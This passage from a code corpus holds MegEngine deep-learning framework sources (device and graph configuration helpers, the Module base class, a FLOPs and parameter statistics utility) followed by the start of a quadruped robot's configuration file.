_mgb.CompNode._set_device_map(device_type, int(logical_dev), int(physical_dev))
def set_default_device(physical_dev, device_type=None):
"""set physcal device for xpux
when *device_type* is None and *physical_dev* starts with *gpu* or *cpu*,
the default device type would be modified accordingly for future calls to
:func:`set_device_map` when remapping device number.
"""
global _default_device_type
if (
device_type is None
and isinstance(physical_dev, str)
and not physical_dev.isdigit()
and not physical_dev.startswith("xpu")
):
t = physical_dev[:3]
if t == "gpu":
_default_device_type = "CUDA"
else:
assert t == "cpu", "bad physical_dev: {}".format(physical_dev)
_default_device_type = "CPU"
set_default_device_type(_default_device_type)
device_type = _default_device_type
set_device_map(-1, physical_dev, device_type)
def set_default_device_type(device_type):
"""set device type for xpu"""
global _default_device_type
device_type = device_type.upper()
_mgb.CompNode._set_unspec_device_type(device_type)
_default_device_type = device_type
def set_fork_cuda_warning_flag(flag):
"""set warning to be printed at fork if cuda has been initialized
:type flag: int
:param flag: controls how the warning should be printed:
* 0: disable warning
* 1: print warning to log
* 2: print warning to log and raise exception
"""
_mgb._config.set_fork_cuda_warning_flag(int(flag))
def get_device_count(device_type="xpu", warn=True):
"""get number of devices installed on this system
:param device_type: device type, one of 'xpu', 'gpu' or 'cpu'
:type device_type: str
"""
return _mgb.CompNode._get_device_count(device_type.upper(), warn)
def parse_locator(device_name: str) -> tuple:
"""get the tensor locator expression by device name.
:param device_name: device name, like 'cpu0', 'gpu1' and 'xpux'
:type device_name: str
:return: (device_type, dev_num, stream_num)
"""
return _mgb.CompNode._parse_locator(device_name)
def set_mem_reserve_size(size):
"""set memory reserve size:
* If *size* is greater than 1, it is the absolute amount of memory to
be reserved in MB;
* If *size* is in the range (0, 1), it is the ratio of total memory;
* If *size* is 0, memory reservation and pre-allocation would be
disabled;
* If *size* is -1, disable custom memory allocator and use cuda APIs
directly.
"""
_mgb._config.set_mem_reserve_size(float(size))
def set_comp_graph_option(comp_graph, name, val):
"""set computing graph option and return its old value
:type comp_graph: :class:`.CompGraph`
:param comp_graph: the computing graph whose option should be modified
:type name: str
:param name: option name
Currently supported options are:
* "no_profiling_on_shape_change": bool;
When execution strategy is set to profiling, always use the
initial profile result and do not re-run profiling even if input
shape changes.
* "seq_opt.enable_mem_plan_opt": bool
* "seq_opt.enable_mem_reuse_alloc": bool
* "seq_opt.enable_seq_comp_node_opt": bool
* "force_dynamic_alloc": bool
* "var_sanity_check_first_run": bool
* "enable_sublinear_memory_opt": bool
* "enable_memory_swap": bool; whether to enable memory swap; it
usually performs worse than sublinear memory
* "enable_var_mem_defragment": bool
* "allocate_static_mem_after_graph_compile": bool
* "enable_grad_var_static_reshape": bool:
If set to ``True``, dynamically-shaped gradients whose original
shape is statically inferrable would be reshaped, so static
shape inference can continue
* "async_exec_level": int
* ``0``: do not dispatch asynchronously
* ``1``: async dispatch if there are more than 1 cuda comp
nodes
* mask ``0b10``: async for comp nodes with unlimited queue
(e.g. CPU comp nodes)
* mask ``0b100``: async for even one comp node
* "log_level": int
* ``0``: no log info for graph construction/compiling
* ``1``: static memory allocation status,
WorkspaceLimitGetter summary, and optimizer summary
* ``2``: optimizer details and duplicated operators tha are
removed
* "graph_opt.jit": whether to enable JIT
* "graph_opt.tensorrt": whether to enable fine-grained automatic
replacement for TensorRT operators
* "graph_opt.android_nn": whether to enable fine-grained automatic
replacement for Android NN operators
* "graph_opt_level": int
* ``0``: disable
* ``1``: level-1: inplace arith transformations during graph
construction
* ``2``: (default) level-2: level-1, plus global optimization
before graph compiling
* ``3``: also enable JIT
:param val: new option value
:return: old option value
"""
if name == "log_static_mem_alloc":
name = "log_level"
if name == "enable_async_exec":
name = "async_exec_level"
return _mgb._config.set_comp_graph_option(comp_graph, name, int(val))
def comp_graph_is_eager(comp_graph):
return _mgb._config.comp_graph_is_eager(comp_graph)
def add_extra_vardep(var, dep):
"""add *dep* as an extra dependency of *var*, so if *var* is required to
compute the final output when compiling a comp graph, *dep* would also be
included in the computing sequence. Note that the order computing of these
two vars is not guaranteed.
"""
assert isinstance(var, _mgb.SymbolVar) and isinstance(dep, _mgb.SymbolVar)
assert var.owner_graph == dep.owner_graph
return _mgb._config.add_extra_vardep(var, dep)
class _GraphPropertyBase:
"""helper class for implementing operator property setter context managers"""
_cur_graph = None
_graph2stack = None
"""class attribute that maintains mapping from graph to property stack;
should be defined by child classes"""
__prop_setup__ = None
"""overwritten by subclass to setup property"""
__prop_clear__ = None
"""overwritten by subclass to clear property"""
def __init__(self, comp_graph, prop):
""":param comp_graph: computing graph, or None to not set this
property"""
if comp_graph is not None:
assert isinstance(
comp_graph, _mgb.CompGraph
), "invalid comp graph: {!r}".format(comp_graph)
self._cur_graph = comp_graph
self._graph2stack.setdefault(comp_graph, []).append(prop)
def __setup(self, prop):
self.__prop_setup__(self._cur_graph, prop)
def __clear(self):
self.__prop_clear__(self._cur_graph)
def __enter__(self):
if self._cur_graph is None:
return
stack = self._graph2stack[self._cur_graph]
if len(stack) > 1:
# clear nested property
self.__clear()
self.__setup(stack[-1])
def __exit__(self, exc_type, exc_value, exc_traceback):
if self._cur_graph is None:
return
stack = self._graph2stack[self._cur_graph]
self.__clear()
stack.pop()
if stack:
# restore nested property
self.__setup(stack[-1])
else:
del self._graph2stack[self._cur_graph]
class exc_opr_tracker_scope(_GraphPropertyBase):
"""context manager for associating an object with all operators created
within this context; so when an exception is raised, information about the
corresponding operator could be retrieved from
:attr:`.MegBrainError.tracker`
:param comp_graph: the computing graph where the operators should be tracked
:type comp_graph: :class:`.CompGraph`
:param tracker: an arbitrary python object to track the operators
"""
_graph2stack = {}
def __init__(self, comp_graph, tracker):
assert (
tracker is not None
), "bad args for exc_opr_tracker_scope: {!r} {!r}".format(comp_graph, tracker)
super().__init__(comp_graph, tracker)
__prop_setup__ = staticmethod(_mgb._config.begin_set_exc_opr_tracker)
__prop_clear__ = staticmethod(_mgb._config.end_set_exc_opr_tracker)
class opr_priority_scope(_GraphPropertyBase):
"""context manager for setting priority for all operators created in this
context
:param comp_graph: the computing graph for which operator priority should
be set
:type comp_graph: :class:`.CompGraph`
:param priority: operator priority. Smaller number means higher priority.
Default value is 0. Grad operator would use negative priority by
default.
"""
_graph2stack = {}
LOWEST_PRIORITY = 2 ** 31 - 1
"""lowest prority (i.e. max possible value)"""
HIGHEST_PRIORITY = -LOWEST_PRIORITY
"""highest prority (i.e. min possible value)"""
def __init__(self, comp_graph, priority):
super().__init__(comp_graph, int(priority))
__prop_setup__ = staticmethod(_mgb._config.begin_set_opr_priority)
__prop_clear__ = staticmethod(_mgb._config.end_set_opr_priority)
OprTrackerResult = collections.namedtuple(
"OprTrackerResult", ["msg", "tracker", "grad_tracker"]
)
def get_opr_tracker(cg, var_id):
"""get the tracking object associated with the owner operator of a var
:param cg: the computing graph
:param var_id: id of the var whose owner opr tracker should be found
:return: if no var is found, ``None`` is returned; otherwise return an
:class:`OprTrackerResult` object
"""
assert isinstance(cg, _mgb.CompGraph)
ret = _mgb._config.get_opr_tracker(cg, int(var_id))
if ret is None:
return
return OprTrackerResult(*ret)
def set_opr_sublinear_memory_endpoint(var):
"""set the owner operator of a symvar to be endpoint of sublinear memory
optimizer
:type var: :class:`.SymbolVar`
"""
_mgb._config.set_opr_sublinear_memory_endpoint(var)
def max_size_t():
"""get max value of size_t type on local architecture"""
return _mgb.max_size_t()
def is_cuda_ctx_set():
"""return whether current thread has an active cuda driver context"""
return _mgb._config.is_cuda_ctx_set()
def get_include_path():
"""get include path for building megbrain extensions"""
return os.path.join(os.path.realpath(os.path.dirname(__file__)), "include")
def get_cuda_gencode(only_cap=False):
"""get -gencode options to be passed to nvcc for compiling on local
machine
:param only_cap: if True, return only a list of cuda compute capability
strings (like ``['35', '52']`` )
"""
ret = _mgb._config.get_cuda_gencode().split()
if not only_cap:
ret = " ".join(map("-gencode arch=compute_{0},code=sm_{0}".format, ret))
return ret
def get_cuda_lib_path():
"""get the cuda lib64 path by locating nvcc
"""
return _mgb._config.get_cuda_lib_path()
def get_cuda_include_path():
"""get the cuda include path by locating nvcc, including
parent path and `parent path`/include
"""
return _mgb._config.get_cuda_include_path()
def get_cuda_version():
"""get runtime cuda version
"""
return _mgb._config.get_cuda_version()
def is_local_cuda_env_ok():
"""check whether local cuda environment ok by locating nvcc
"""
return _mgb._config.is_local_cuda_env_ok()
def is_compiled_with_cuda():
"""whether cuda is enabled at compile time"""
return _mgb._config.is_compiled_with_cuda()
def load_opr_library(path):
"""Load an external operator library. This essentially sets megbrain
symbols as public and load the library.
:param path: path to the shared object; if it is None, then only megbrain
symbols are made public.
"""
_mgb._config.load_opr_library(
os.path.realpath(os.path.join(os.path.dirname(__file__), "_mgb.so")), path
)
def dump_registered_oprs():
"""
get all registered oprs, return dict(id, name)
"""
return dict(_mgb._config.dump_registered_oprs())
def create_mm_server(server_addr, port):
"""
create mm server with server address
throw exception if server_addr is already used
"""
return _mgb._config.create_mm_server(server_addr, port)
def group_barrier(server_addr, port, size, rank):
"""
block until all ranks reach this barrier
"""
return _mgb._config.group_barrier(server_addr, port, size, rank)
```
#### File: megengine/module/module.py
```python
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
from typing import Any, Callable, Iterable, Optional, Set, Tuple, Union
import numpy as np
from .._internal.dtype import is_quantize
from ..core import Buffer, Parameter, Tensor
from ..logger import get_logger
from ..utils.hook import HookHandler
logger = get_logger(__name__)
def _expand_structure(key, obj):
if isinstance(obj, (Tensor, Module)):
return [(key, obj)]
elif isinstance(obj, (list, tuple, dict)):
ret = []
if isinstance(obj, dict):
targets = ((k, obj[k]) for k in sorted(obj))
else:
targets = ((str(k), v) for k, v in enumerate(obj))
for k, o in targets:
sub_ret = _expand_structure(k, o)
if sub_ret and not isinstance(k, str):
raise AssertionError(
"keys for Tensor and Module must be str, error key: {}".format(k)
)
for kt, vt in sub_ret:
ret.extend([(key + "." + kt, vt)])
return ret
else:
return []
def _is_parameter(obj):
return isinstance(obj, Parameter)
def _is_buffer(obj):
return isinstance(obj, Buffer)
def _is_module(obj):
return isinstance(obj, Module)
class Module(metaclass=ABCMeta):
"""Base Module class.
"""
def __init__(self):
# runtime attributes
self.training = True
self.quantize_disabled = False
# hooks
self._forward_pre_hooks = OrderedDict()
self._forward_hooks = OrderedDict()
@abstractmethod
def forward(self, inputs):
pass
def register_forward_pre_hook(self, hook: Callable) -> HookHandler:
"""Register a hook to handle forward inputs. `hook` should be a function
Note that `inputs` keyword inputs
:param hook: a function that receive `module` and `inputs`, then return
a modified `inputs` or `None`.
:return: a handler with :meth:`~.HookHandler.remove` interface to delete the hook.
"""
return HookHandler(self._forward_pre_hooks, hook)
def register_forward_hook(self, hook: Callable) -> HookHandler:
"""Register a hook to handle forward results. `hook` should be a function that
receive `module`, `inputs` and `outputs`, then return a modified `outputs` or `None`.
This method return a handler with :meth:`~.HookHandler.remove` interface to delete the hook.
"""
return HookHandler(self._forward_hooks, hook)
def __call__(self, *inputs, **kwargs):
for hook in self._forward_pre_hooks.values():
modified_inputs = hook(self, inputs)
if modified_inputs is not None:
if not isinstance(modified_inputs, tuple):
modified_inputs = (modified_inputs,)
inputs = modified_inputs
outputs = self.forward(*inputs, **kwargs)
for hook in self._forward_hooks.values():
modified_outputs = hook(self, inputs, outputs)
if modified_outputs is not None:
outputs = modified_outputs
return outputs
def _flatten(
self,
*,
recursive: bool = True,
with_key: bool = False,
with_parent: bool = False,
prefix: Optional[str] = None,
predicate: Callable[[Any], bool] = lambda _: True,
seen: Optional[Set[int]] = None
) -> Union[Iterable[Any], Iterable[Tuple[str, Any]]]:
"""Scans the module object and returns an iterable for the :class:`~.Tensor`
and :class:`~.Module` attributes that agree with the ``predicate``. For multiple
calls of this function with same arguments, the order of objects within the
returned iterable is guaranteed to be identical, as long as all the involved
module objects' ``__dict__`` does not change thoughout those calls.
:param recursive: Whether to recursively scan all the submodules.
:param with_key: Whether to yield keys along with yielded objects.
:param with_parent: Whether to yield ``self`` along with yielded objects.
:param prefix: The prefix appended to the yielded keys.
:param predicate: The predicate function applied to scanned objects.
:param seen: A dict that records whether a module has been traversed yet.
"""
if seen is None:
seen = set([id(self)])
module_dict = vars(self)
_prefix = "" if prefix is None else prefix + "."
for key in sorted(module_dict):
for expanded_key, leaf in _expand_structure(key, module_dict[key]):
leaf_id = id(leaf)
if leaf_id in seen:
continue
seen.add(leaf_id)
if predicate(leaf):
if with_key and with_parent:
yield _prefix + expanded_key, leaf, self
elif with_key:
yield _prefix + expanded_key, leaf
elif with_parent:
yield leaf, self
else:
yield leaf
if recursive and isinstance(leaf, Module):
yield from leaf._flatten(
recursive=recursive,
with_key=with_key,
with_parent=with_parent,
prefix=_prefix + expanded_key if with_key else None,
predicate=predicate,
seen=seen,
)
def parameters(
self, requires_grad: Optional[bool] = None, recursive: bool = True, **kwargs
) -> Iterable[Parameter]:
r"""Returns an iterable for the :class:`~.Parameter` of the module.
:param requires_grad: Limitation over the :attr:`~.Parameter.requires_grad`
attribute of returned :class:`.Parameter`. ``None`` for no limitation.
:param recursive: If ``True``, returns all :class:`~.Parameter` within this
module, else only returns :class:`~.Parameter` that are direct attributes
of this module.
"""
def predicate(obj) -> bool:
return _is_parameter(obj) and (
requires_grad is None or obj.requires_grad == requires_grad
)
yield from self._flatten(
with_key=False, predicate=predicate, recursive=recursive, **kwargs
)
def named_parameters(
self,
requires_grad: Optional[bool] = None,
prefix: Optional[str] = None,
recursive: bool = True,
**kwargs
) -> Iterable[Tuple[str, Parameter]]:
"""Returns an iterable for key :class:`~.Parameter` pairs of the module, where
``key`` is the dotted path from this module to the :class:`~.Parameter` .
:param requires_grad: Limitation over the :attr:`~.Parameter.requires_grad`
attribute of returned :class:`~.Parameter` . ``None`` for no limitation.
:param prefix: The prefix prepended to the keys.
:param recursive: If ``True``, returns all :class:`~.Parameter` within this
module, else only returns :class:`~.Parameter` that are direct attributes
of this module.
"""
def predicate(obj) -> bool:
return _is_parameter(obj) and (
requires_grad is None or obj.requires_grad == requires_grad
)
yield from self._flatten(
with_key=True,
prefix=prefix,
predicate=predicate,
recursive=recursive,
**kwargs,
)
def buffers(self, recursive: bool = True, **kwargs) -> Iterable[Buffer]:
"""Returns an iterable for the :class:`~.Buffer` of the module.
:param recursive: If ``True``, returns all :class:`~.Buffer` within this
module, else only returns :class:`~.Buffer` that are direct attributes
of this module.
"""
yield from self._flatten(
with_key=False, predicate=_is_buffer, recursive=recursive, **kwargs
)
def named_buffers(
self, prefix: Optional[str] = None, recursive: bool = True, **kwargs
) -> Iterable[Tuple[str, Buffer]]:
"""Returns an iterable for key :class:`~.Buffer` pairs of the module, where
``key`` is the dotted path from this module to the :class:`~.Buffer` .
:param prefix: The prefix prepended to the keys.
:param recursive: If ``True``, returns all :class:`~.Buffer` within this
module, else only returns :class:`~.Buffer` that are direct attributes
of this module.
"""
yield from self._flatten(
with_key=True,
prefix=prefix,
predicate=_is_buffer,
recursive=recursive,
**kwargs,
)
def children(self, **kwargs) -> "Iterable[Module]":
"""Returns an iterable for all the submodules that are direct attributes of this
module.
"""
yield from self._flatten(
with_key=False, predicate=_is_module, recursive=False, **kwargs
)
def named_children(self, **kwargs) -> "Iterable[Tuple[str, Module]]":
"""Returns an iterable of key-submodule pairs for all the submodules that are
direct attributes of this module, where 'key' is the attribute name of
submodules.
"""
yield from self._flatten(
with_key=True, predicate=_is_module, recursive=False, **kwargs
)
def modules(self, **kwargs) -> "Iterable[Module]":
"""Returns an iterable for all the modules within this module, including itself.
"""
if "with_parent" in kwargs and kwargs["with_parent"]:
yield self, None
else:
yield self
yield from self._flatten(with_key=False, predicate=_is_module, **kwargs)
def named_modules(
self, prefix: Optional[str] = None, **kwargs
) -> "Iterable[Tuple[str, Module]]":
"""Returns an iterable of key-module pairs for all the modules within this
module, including itself, where 'key' is the dotted path from this module to the
submodules.
:param prefix: The prefix prepended to the path.
"""
if "with_parent" in kwargs and kwargs["with_parent"]:
yield ("" if prefix is None else prefix), self, None
else:
yield ("" if prefix is None else prefix), self
yield from self._flatten(
with_key=True, prefix=prefix, predicate=_is_module, **kwargs
)
def apply(self, fn: "Callable[[Module], Any]") -> None:
"""Apply function ``fn`` to all the modules within this module, including
itself.
:param fn: The function to be applied on modules.
"""
for it in self.modules():
fn(it)
def zero_grad(self) -> None:
"""Set all parameters' grads to zero
"""
for param in self.parameters():
if param.grad is not None:
param.grad.reset_zero()
def train(self, mode: bool = True, recursive: bool = True) -> None:
"""Set training mode of all the modules within this module (including itself) to
``mode``. This effectively sets the ``training`` attributes of those modules
to ``mode``, but only has effect on certain modules (e.g.
:class:`~.BatchNorm2d`, :class:`~.Dropout`, :class:`~.Observer`)
:param mode: the training mode to be set on modules.
:param recursive: whether to recursively call submodules' ``train()``.
"""
if not recursive:
self.training = mode
return
def fn(module: Module) -> None:
module.train(mode, recursive=False)
self.apply(fn)
def eval(self) -> None:
"""Set training mode of all the modules within this module (including itself) to
``False``. See :meth:`~.Module.train` for details.
"""
self.train(False)
def disable_quantize(self, value=True):
r"""
Set ``module``'s ``quantize_disabled`` attribute and return ``module``.
Could be used as a decorator.
"""
def fn(module: Module) -> None:
module.quantize_disabled = value
self.apply(fn)
def replace_param(
self, params: dict, start_pos: int, seen: Optional[Set[int]] = None
):
"""Replace module's parameters with `params`, used by :class:`~.ParamPack` to
speedup multimachine training.
"""
offset = 0
if seen is None:
seen = set([id(self)])
module_dict = vars(self)
for key in sorted(module_dict):
hash_id = id(module_dict[key])
if hash_id in seen:
continue
seen.add(hash_id)
if isinstance(module_dict[key], Parameter):
if start_pos + offset in params:
assert module_dict[key].shape == params[start_pos + offset].shape
module_dict[key] = params[start_pos + offset]
offset += 1
if isinstance(module_dict[key], Module):
offset += module_dict[key].replace_param(
params, start_pos + offset, seen
)
return offset
def state_dict(self, rst=None, prefix="", keep_var=False):
r"""Returns a dictionary containing whole states of the module.
"""
def is_state(obj):
return _is_parameter(obj) or _is_buffer(obj)
if rst is None:
rst = OrderedDict()
for k, v in self._flatten(recursive=False, with_key=True, predicate=is_state):
assert prefix + k not in rst, "duplicated state: {}".format(k)
if keep_var:
rst[prefix + k] = v
else:
rst[prefix + k] = v.numpy()
for k, submodule in self._flatten(
recursive=False,
with_key=True,
predicate=lambda obj: isinstance(obj, Module),
):
submodule.state_dict(rst, prefix + k + ".", keep_var)
return rst
def load_state_dict(
self,
state_dict: Union[dict, Callable[[str, Tensor], Optional[np.ndarray]]],
strict=True,
):
r"""Load a given dictionary created by :func:`state_dict` into this module.
If ``strict`` is ``True``, the keys of :func:`state_dict` must exactly match the keys
returned by :func:`state_dict`.
Users can also pass a closure: `Function[key: str, var: Tensor] -> Optional[np.ndarray]`
as a `state_dict`, in order to handle complex situations. For example, load everything
except for the final linear classifier:
.. code-block::
state_dict = {...} # Dict[str, np.ndarray]
model.load_state_dict({
k: None if k.startswith('fc') else v
for k, v in state_dict.items()
}, strict=False)
Here returning `None` means skipping parameter `k`.
To prevent shape mismatch (e.g. load PyTorch weights), we can reshape before loading:
.. code-block::
state_dict = {...}
def reshape_accordingly(k, v):
return state_dict[k].reshape(v.shape)
model.load_state_dict(reshape_accordingly)
We can also perform inplace re-initialization or pruning:
.. code-block::
def reinit_and_pruning(k, v):
if 'bias' in k:
M.init.zero_(v)
if 'conv' in k:
return v.numpy() * (np.abs(v.numpy()) > 1e-3).astype("float32)
model.load_state_dict(reinit_and_pruning, strict=False)
"""
unused = []
if isinstance(state_dict, dict):
unused = state_dict.keys()
def closure(k, _): # var unused
return state_dict[k] if k in state_dict else None
elif callable(state_dict):
closure = state_dict
else:
raise ValueError(
"`state_dict` must load a dict or callable, got {}".format(
type(state_dict)
)
)
loaded, skipped = self._load_state_dict_with_closure(closure)
unused = set(unused) - loaded
if len(unused) != 0:
if strict:
raise KeyError(
"Unused params violate `strict=True`, unused={}".format(unused)
)
else:
logger.warning(
"Unused params in `strict=False` mode, unused={}".format(unused)
)
if len(skipped) != 0:
if strict:
raise KeyError(
"Missing params violate `strict=True`, missing={}".format(skipped)
)
else:
logger.warning(
"Missing params in `strict=False` mode, missing={}".format(skipped)
)
def _load_state_dict_with_closure(self, closure):
"""Advance state_dict load through callable `closure` whose signature is
`closure(key: str, var: Tensor) -> Union[np.ndarry, None]`
"""
assert callable(closure), "closure must be a function"
loaded = []
skipped = []
local_state_dict = self.state_dict(keep_var=True)
for k, var in local_state_dict.items():
to_be_load = closure(k, var)
if to_be_load is None:
skipped.append(k)
continue
assert isinstance(
to_be_load, np.ndarray
), "closure should return a `np.ndarray`, now `{}` get {}".format(
k, to_be_load
)
assert (
var.shape == to_be_load.shape
), "param `{}` shape mismatch, should be {}, get {}".format(
k, var.shape, to_be_load.shape
)
# For quantized dtype, the initialized dtype
# scale/zero_points maybe invalid, use pretrained dtype instead.
if is_quantize(to_be_load.dtype) and is_quantize(var.dtype):
var.dtype = to_be_load.dtype
var.set_value(to_be_load)
loaded.append(k)
return set(loaded), set(skipped)
```
#### File: megengine/utils/net_stats.py
```python
from functools import partial
import numpy as np
import tabulate
import megengine as mge
import megengine._internal as mgb
import megengine.module as m
import megengine.module.qat as qatm
import megengine.module.quantized as qm
try:
mge.logger.MegEngineLogFormatter.max_lines = float("inf")
except AttributeError as e:
raise ValueError("set logger max lines failed")
logger = mge.get_logger(__name__)
CALC_FLOPS = {}
def _register_modules(*modules):
def callback(impl):
for module in modules:
CALC_FLOPS[module] = impl
return impl
return callback
@_register_modules(
m.Conv2d,
m.ConvTranspose2d,
m.LocalConv2d,
qm.Conv2d,
qm.ConvRelu2d,
qm.ConvBn2d,
qm.ConvBnRelu2d,
qatm.Conv2d,
qatm.ConvRelu2d,
qatm.ConvBn2d,
qatm.ConvBnRelu2d,
)
def count_convNd(module, input, output):
bias = 1 if module.bias is not None else 0
group = module.groups
ic = input[0].shape[1]
oc = output[0].shape[1]
goc = oc // group
gic = ic // group
N = output[0].shape[0]
HW = np.prod(output[0].shape[2:])
# N x Cout x H x W x (Cin x Kw x Kh + bias)
return N * HW * goc * (gic * np.prod(module.kernel_size) + bias)
@_register_modules(m.ConvTranspose2d)
def count_deconvNd(module, input, output):
return np.prod(input[0].shape) * output[0].shape[1] * np.prod(module.kernel_size)
@_register_modules(m.Linear, qatm.Linear, qm.Linear)
def count_linear(module, input, output):
return np.prod(output[0].shape) * module.in_features
# does not need import qat and quantized module since they inherit from float module.
hook_modules = (
m.Conv2d,
m.ConvTranspose2d,
m.LocalConv2d,
m.BatchNorm2d,
m.Linear,
)
def net_stats(model, input_size, bar_length_max=20, log_params=True, log_flops=True):
def dict2table(list_of_dict, header):
table_data = [header]
for d in list_of_dict:
row = []
for h in header:
v = ""
if h in d:
v = d[h]
row.append(v)
table_data.append(row)
return table_data
def sizeof_fmt(num, suffix="B"):
for unit in ["", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi"]:
if abs(num) < 1024.0:
return "{:3.3f} {}{}".format(num, unit, suffix)
num /= 1024.0
sign_str = "-" if num < 0 else ""
return "{}{:.1f} {}{}".format(sign_str, num, "Yi", suffix)
def get_byteswidth(tensor):
dtype = tensor.dtype
if mgb.dtype.is_quantize(dtype):
return 1
elif mgb.dtype.is_bfloat16(dtype):
return 2
else:
return 4
def print_flops_stats(flops):
flops_list = [i["flops_num"] for i in flops]
max_flops_num = max(flops_list + [0])
# calc total flops and set flops_cum
total_flops_num = 0
for d in flops:
total_flops_num += int(d["flops_num"])
d["flops_cum"] = sizeof_fmt(total_flops_num, suffix="OPs")
for i in flops:
f = i["flops_num"]
i["flops"] = sizeof_fmt(f, suffix="OPs")
r = i["ratio"] = f / total_flops_num
i["percentage"] = "{:.2f}%".format(r * 100)
bar_length = int(f / max_flops_num * bar_length_max)
i["bar"] = "#" * bar_length
header = [
"name",
"class_name",
"input_shapes",
"output_shapes",
"flops",
"flops_cum",
"percentage",
"bar",
]
total_flops_str = sizeof_fmt(total_flops_num, suffix="OPs")
total_var_size = sum(sum(s[1] for s in i["output_shapes"]) for i in flops)
flops.append(
dict(name="total", flops=total_flops_str, output_shapes=total_var_size)
)
logger.info(
"flops stats: \n" + tabulate.tabulate(dict2table(flops, header=header))
)
return total_flops_num
def print_params_stats(params):
total_param_dims, total_param_size = 0, 0
for d in params:
total_param_dims += int(d["param_dim"])
total_param_size += int(d["size"])
d["size"] = sizeof_fmt(d["size"])
d["size_cum"] = sizeof_fmt(total_param_size)
for d in params:
ratio = d["param_dim"] / total_param_dims
d["ratio"] = ratio
d["percentage"] = "{:.2f}%".format(ratio * 100)
# construct bar
max_ratio = max([d["ratio"] for d in params])
for d in params:
bar_length = int(d["ratio"] / max_ratio * bar_length_max)
d["size_bar"] = "#" * bar_length
param_size = sizeof_fmt(total_param_size)
params.append(dict(name="total", param_dim=total_param_dims, size=param_size,))
header = [
"name",
"shape",
"mean",
"std",
"param_dim",
"bits",
"size",
"size_cum",
"percentage",
"size_bar",
]
logger.info(
"param stats: \n" + tabulate.tabulate(dict2table(params, header=header))
)
return total_param_size
def net_stats_hook(module, input, output, name=""):
class_name = str(module.__class__).split(".")[-1].split("'")[0]
flops_fun = CALC_FLOPS.get(type(module))
if callable(flops_fun):
flops_num = flops_fun(module, input, output)
if not isinstance(output, (list, tuple)):
output = [output]
flops.append(
dict(
name=name,
class_name=class_name,
input_shapes=[i.shape for i in input],
output_shapes=[o.shape for o in output],
flops_num=flops_num,
flops_cum=0,
)
)
if hasattr(module, "weight") and module.weight is not None:
w = module.weight
value = w.numpy()
param_dim = np.prod(w.shape)
param_bytes = get_byteswidth(w)
params.append(
dict(
name=name + "-w",
shape=w.shape,
param_dim=param_dim,
bits=param_bytes * 8,
size=param_dim * param_bytes,
size_cum=0,
mean="{:.2g}".format(value.mean()),
std="{:.2g}".format(value.std()),
)
)
if hasattr(module, "bias") and module.bias is not None:
b = module.bias
value = b.numpy()
param_dim = np.prod(b.shape)
param_bytes = get_byteswidth(b)
params.append(
dict(
name=name + "-b",
shape=b.shape,
param_dim=param_dim,
bits=param_bytes * 8,
size=param_dim * param_bytes,
size_cum=0,
mean="{:.2g}".format(value.mean()),
std="{:.2g}".format(value.std()),
)
)
# multiple inputs to the network
if not isinstance(input_size[0], tuple):
input_size = [input_size]
params = []
flops = []
hooks = []
for (name, module) in model.named_modules():
if isinstance(module, hook_modules):
hooks.append(
module.register_forward_hook(partial(net_stats_hook, name=name))
)
inputs = [mge.zeros(in_size, dtype=np.float32) for in_size in input_size]
model.eval()
model(*inputs)
for h in hooks:
h.remove()
total_flops, total_params = 0, 0
if log_params:
total_params = print_params_stats(params)
if log_flops:
total_flops = print_flops_stats(flops)
return total_params, total_flops
``` |
{
"source": "13221325403/StanfordQuadruped",
"score": 3
} |
#### File: StanfordQuadruped/pupper/Config.py
```python
import numpy as np
from pupper.ServoCalibration import MICROS_PER_RAD, NEUTRAL_ANGLE_DEGREES
from pupper.HardwareConfig import PS4_COLOR, PS4_DEACTIVATED_COLOR
from enum import Enum
# TODO: put these somewhere else
class PWMParams:
def __init__(self):
self.pins = np.array([[2, 14, 18, 23], [3, 15, 27, 24], [4, 17, 22, 25]])
self.range = 4000
self.freq = 250
class ServoParams:
def __init__(self):
self.neutral_position_pwm = 1500 # Middle position
self.micros_per_rad = MICROS_PER_RAD # Must be calibrated
# The neutral angle of the joint relative to the modeled zero-angle in degrees, for each joint
self.neutral_angle_degrees = NEUTRAL_ANGLE_DEGREES
self.servo_multipliers = np.array(
[[1, 1, 1, 1], [-1, 1, -1, 1], [1, -1, 1, -1]]
)
@property
def neutral_angles(self):
return self.neutral_angle_degrees * np.pi / 180.0 # Convert to radians
class Configuration:
def __init__(self):
################# CONTROLLER BASE COLOR ##############
self.ps4_color = PS4_COLOR
self.ps4_deactivated_color = PS4_DEACTIVATED_COLOR
#################### COMMANDS ####################
self.max_x_velocity = 0.4
self.max_y_velocity = 0.3
self.max_yaw_rate = 2.0
self.max_pitch = 30.0 * np.pi / 180.0
#################### MOVEMENT PARAMS ####################
self.z_time_constant = 0.02
self.z_speed = 0.03 # maximum speed [m/s]
self.pitch_deadband = 0.02
self.pitch_time_constant = 0.25
self.max_pitch_rate = 0.15
self.roll_speed = 0.16 # maximum roll rate [rad/s]
self.yaw_time_constant = 0.3
self.max_stance_yaw = 1.2
self.max_stance_yaw_rate = 2.0
#################### STANCE ####################
self.delta_x = 0.1
self.delta_y = 0.09
self.x_shift = 0.0
self.default_z_ref = -0.16
#################### SWING ######################
self.z_coeffs = None
self.z_clearance = 0.07
self.alpha = (
0.5 # Ratio between touchdown distance and total horizontal stance movement
)
self.beta = (
0.5 # Ratio between touchdown distance and total horizontal stance movement
)
#################### GAIT #######################
self.dt = 0.01
self.num_phases = 4
self.contact_phases = np.array(
[[1, 1, 1, 0], [1, 0, 1, 1], [1, 0, 1, 1], [1, 1, 1, 0]]
)
self.overlap_time = (
0.10 # duration of the phase where all four feet are on the ground
)
self.swing_time = (
0.15 # duration of the phase when only two feet are on the ground
)
######################## GEOMETRY ######################
self.LEG_FB = 0.10 # front-back distance from center line to leg axis
self.LEG_LR = 0.04 # left-right distance from center line to leg plane
self.LEG_L2 = 0.115
self.LEG_L1 = 0.1235
self.ABDUCTION_OFFSET = 0.03 # distance from abduction axis to leg
self.FOOT_RADIUS = 0.01
self.HIP_L = 0.0394
self.HIP_W = 0.0744
self.HIP_T = 0.0214
self.HIP_OFFSET = 0.0132
self.L = 0.276
self.W = 0.100
self.T = 0.050
self.LEG_ORIGINS = np.array(
[
[self.LEG_FB, self.LEG_FB, -self.LEG_FB, -self.LEG_FB],
[-self.LEG_LR, self.LEG_LR, -self.LEG_LR, self.LEG_LR],
[0, 0, 0, 0],
]
)
self.ABDUCTION_OFFSETS = np.array(
[
-self.ABDUCTION_OFFSET,
